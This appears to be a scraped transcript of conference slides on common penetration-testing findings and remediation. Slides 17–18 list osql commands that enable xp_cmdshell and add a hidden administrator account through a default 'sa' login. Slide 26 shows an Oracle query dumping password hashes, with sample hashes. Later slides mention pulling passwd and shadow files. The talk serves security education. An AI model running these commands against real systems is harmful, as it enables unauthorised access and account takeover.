Presentation is loading. Please wait.

Presentation is loading. Please wait.

CarolinaCon 9 The Low Hanging Fruit of Penetration Testing Presented by: Bryan Miller.

Similar presentations


Presentation on theme: "CarolinaCon 9 The Low Hanging Fruit of Penetration Testing Presented by: Bryan Miller."— Presentation transcript:

1 CarolinaCon 9 The Low Hanging Fruit of Penetration Testing Presented by: Bryan Miller

2 CarolinaCon 9  Pen Testing vs. VA vs. Risk Assessments  Penetration Testing Concepts/Issues  What is Low Hanging Fruit  Low Hanging Fruit Examples  Wrap Up 3/16/2013 The Low Hanging Fruit of Penetration Testing 2 AGENDA

3 CarolinaCon 9  B.S. I.S., M.S. C.S. – Virginia Commonwealth University  Current CISSP, former Banyan CBE & Cisco CCIE  Former adjunct professor – I.S. & C.S. – VCU  ISSA, ISACA, IALR and VA SCAN lecturer  Penetration testing for 11+ years  Published author with 25 years in I.T. 3/16/2013 The Low Hanging Fruit of Penetration Testing 3

4 CarolinaCon 9 3/16/2013 The Low Hanging Fruit of Penetration Testing Penetration Testing vs. Vulnerability Assessments vs. Risk Assessments 4

5 CarolinaCon 9  Penetration Testing  Tests for actual vulnerabilities and what can be exploited  Value add comes from putting the pieces together  Vulnerability Assessment  Reports on potential vulnerabilities without testing them  Assigns risk values to each issue  Risk Assessment  More analytical and less technical  Great for overviews but IMHO it will never catch LHF 3/16/2013 The Low Hanging Fruit of Penetration Testing 5

6 CarolinaCon 9 3/16/2013 The Low Hanging Fruit of Penetration Testing Penetration Testing Concepts/Issues 6

7 CarolinaCon 9  Types of testing  External  Testing from outside the security perimeter (firewall)  Internet, dial-in, wireless, physical & social engineering  Usually performed in a black-box approach w/no credentials 3/16/2013 The Low Hanging Fruit of Penetration Testing 7

8 CarolinaCon 9  Types of testing  Internal  What is accessible inside the security perimeter  White-box or black-box depending on goals  Tests for effects of automated malicious software 3/16/2013 The Low Hanging Fruit of Penetration Testing 8

9 CarolinaCon 9  Issues - Requirements definition  Do you need a penetration test, VA or risk assessment?  Sometimes you may need more than one  What is the ultimate goal of the test?  Physical → Test security cameras, locks and alarms  Social Engineering → Test HR policies and procedures  Vulnerability Assessment → Patch scan  How do you define success?  How do you know if the test succeeded or failed?  Sometimes difficult to define for a penetration test 3/16/2013 The Low Hanging Fruit of Penetration Testing 9

10 CarolinaCon 9  Issues - In-house or outsourced?  In-house  Keeping qualified staff happy is a tough job  Tools and training can be very expensive  Sometimes you just need an unbiased 2 nd opinion  Outsourced  How do you judge competency?  Do they have a methodology, tool list, references?  Do they outsource their work?  Geography/vertical market coverage 3/16/2013 The Low Hanging Fruit of Penetration Testing 10

11 CarolinaCon 9  Issues  Deliverables  Will the report include specific recommendations?  Is there tool output for verification?  No boilerplate text!  Remediation  If you don’t plan on fixing the issues, don’t waste the time or money performing the tests  Post-remediation testing  Critical to ensure that all issues have been resolved 3/16/2013 The Low Hanging Fruit of Penetration Testing 11

12 CarolinaCon 9 3/16/2013 The Low Hanging Fruit of Penetration Testing What is Low Hanging Fruit? 12

13 CarolinaCon 9  The Low Hanging Fruit Top Ten 6. Permissions on data resources 7. Employee security awareness 8. Encryption 9. Policies & procedures 10. Physical security 3/16/2013 The Low Hanging Fruit of Penetration Testing 13

14 CarolinaCon 9  The Low Hanging Fruit Top Ten 1. Password management 2. Default security controls 3. OS and application patches 4. SQL Injection, XSS, URL issues 5. Wireless access points/modems 3/16/2013 The Low Hanging Fruit of Penetration Testing 14

15 CarolinaCon 9 3/16/2013 The Low Hanging Fruit of Penetration Testing Low Hanging Fruit Examples 15

16 CarolinaCon 9 3/16/2013 The Low Hanging Fruit of Penetration Testing 16

17 CarolinaCon 9  Turn on “xp_cmdshell” if it’s disabled 1. osql –S10.1.1.1 -U sa -P pwd -Q"EXECUTE master.dbo.sp_configure 'show advanced options', 1" 2. osql –S10.1.1.1 -U sa -P pwd -Q"RECONFIGURE" 3. osql –S10.1.1.1 -U sa -P pwd -Q"EXECUTE master.dbo.sp_configure ‘xp_cmdshell’, 1" 4. osql –S10.1.1.1 -U sa -P pwd -Q"RECONFIGURE" Fun with Microsoft SQL 3/16/2013 The Low Hanging Fruit of Penetration Testing 17

18 CarolinaCon 9  Add administrative user 1. osql -S10.1.1.1 -U sa -P pwd -Q"EXECUTE xp_cmdshell 'net user bmiller passwd /add'" 2. osql -S10.1.1.1 -U sa -P pwd -Q"EXECUTE xp_cmdshell 'net localgroup administrators bmiller /add'" More Fun with Microsoft SQL 3/16/2013 The Low Hanging Fruit of Penetration Testing 18

19 CarolinaCon 9 3/16/2013 The Low Hanging Fruit of Penetration Testing 19 The Trouble with VNC

20 CarolinaCon 9 There are many ways to get the VNC password hashes… 3/16/2013 The Low Hanging Fruit of Penetration Testing 20

21 CarolinaCon 9 3/16/2013 The Low Hanging Fruit of Penetration Testing 21

22 CarolinaCon 9 3/16/2013 The Low Hanging Fruit of Penetration Testing 22

23 CarolinaCon 9 3/16/2013 The Low Hanging Fruit of Penetration Testing 23

24 CarolinaCon 9 3/16/2013 The Low Hanging Fruit of Penetration Testing 24

25 CarolinaCon 9 3/16/2013 The Low Hanging Fruit of Penetration Testing 25

26 CarolinaCon 9  Dumping password hashes – non-privileged account 1. Logged in as “dbsnmp”, we ran the following query:  select username, password from dba_users;  DBSNMP AE1E40C725DFCAC8  AQADMIN 739EF27E22AC39DC  SYS C10A280B9CFF9A72  SYSTEM 04D19DEFD642AF2 0 Fun with Oracle 3/16/2013 The Low Hanging Fruit of Penetration Testing 26

27 CarolinaCon 9 2. Ran CheckPWD: 3/16/2013 The Low Hanging Fruit of Penetration Testing 27

28 CarolinaCon 9 3/16/2013 The Low Hanging Fruit of Penetration Testing 28 Reboot via Compaq Insight Manager (CIM)

29 CarolinaCon 9 3/16/2013 The Low Hanging Fruit of Penetration Testing 29

30 CarolinaCon 9 3/16/2013 The Low Hanging Fruit of Penetration Testing 30

31 CarolinaCon 9 3/16/2013 The Low Hanging Fruit of Penetration Testing 31

32 CarolinaCon 9 3/16/2013 The Low Hanging Fruit of Penetration Testing 32

33 CarolinaCon 9 3/16/2013 The Low Hanging Fruit of Penetration Testing 33

34 CarolinaCon 9 3/16/2013 The Low Hanging Fruit of Penetration Testing 34 Appliances are not immune….

35 CarolinaCon 9 3/16/2013 The Low Hanging Fruit of Penetration Testing 35 Downloaded passwd, shadow, host files

36 CarolinaCon 9 3/16/2013 The Low Hanging Fruit of Penetration Testing 36

37 CarolinaCon 9 3/16/2013 The Low Hanging Fruit of Penetration Testing 37

38 CarolinaCon 9 3/16/2013 The Low Hanging Fruit of Penetration Testing 38

39 CarolinaCon 9 3/16/2013 The Low Hanging Fruit of Penetration Testing 39

40 CarolinaCon 9 3/16/2013 The Low Hanging Fruit of Penetration Testing 40

41 CarolinaCon 9 3/16/2013 The Low Hanging Fruit of Penetration Testing 41

42 CarolinaCon 9 3/16/2013 The Low Hanging Fruit of Penetration Testing 42

43 CarolinaCon 9 3/16/2013 The Low Hanging Fruit of Penetration Testing 43

44 CarolinaCon 9 3/16/2013 The Low Hanging Fruit of Penetration Testing 44

45 CarolinaCon 9 3/16/2013 The Low Hanging Fruit of Penetration Testing 45 Looks like we can request any file?

46 CarolinaCon 9 3/16/2013 The Low Hanging Fruit of Penetration Testing 46 OK, we’ll ask for the password file. Next up, JTR!

47 CarolinaCon 9 3/16/2013 The Low Hanging Fruit of Penetration Testing 47 This is why PCI doesn’t allow WEP

48 CarolinaCon 9 3/16/2013 The Low Hanging Fruit of Penetration Testing 48 What the fake telephone repairman saw…

49 CarolinaCon 9 3/16/2013 The Low Hanging Fruit of Penetration Testing 49 The danger of scripts laying around…

50 CarolinaCon 9 3/16/2013 The Low Hanging Fruit of Penetration Testing Wrap-Up 50

51 CarolinaCon 9  Data breaches affect your organization’s reputation and can cost you money.  Software is becoming more complex while attacker tools are becoming easier to use.  Data breaches can be reduced by following best practice rules to eliminate LHF. 3/16/2013 The Low Hanging Fruit of Penetration Testing 51

52 CarolinaCon 9  Remember the 3 P’s:  Policies & Procedures  Password Management  Patching 3/16/2013 The Low Hanging Fruit of Penetration Testing 52

53 CarolinaCon 9 3/16/2013 The Low Hanging Fruit of Penetration Testing 53 Q&A Bryan Miller bryan@syrinxtech.com


Download ppt "CarolinaCon 9 The Low Hanging Fruit of Penetration Testing Presented by: Bryan Miller."

Similar presentations


Ads by Google